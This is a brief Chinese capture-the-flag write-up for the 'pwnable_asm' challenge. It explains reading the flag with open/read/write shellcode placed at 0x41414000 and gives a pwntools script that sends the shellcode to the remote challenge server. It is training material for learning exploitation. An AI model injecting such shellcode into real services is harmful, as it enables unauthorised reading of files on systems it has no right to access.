pwnable_asm

pwnable_asm

查看保护


orw来读flag就可以了，程序在0x41414000这里创建了0x1000大小的空间，我们可以将flag拿到这里然后 输出即可。
orw其实就是open read write
open(file=‘flag’, oflag=0, mode=0);
read(3, 0x41414000, 0x100)
write(fd=1, buf=0x41414000, n=0x100)
意思就是打开flag，读取flag到0x41414000，从0x41414000中读取数据到屏幕
这里用汇编写就可以了，这题可以直接用pwntools自带的open read 和write来拿flag。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29493)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)


offest = 0x41414000

shellcode = ''
shellcode += shellcraft.open('flag')
shellcode += shellcraft.read(3, offest, 0x100)
shellcode += shellcraft.write(1, offest, 0x100)
print(shellcode)
shellcode = asm(shellcode)

r.sendline(shellcode)

r.interactive()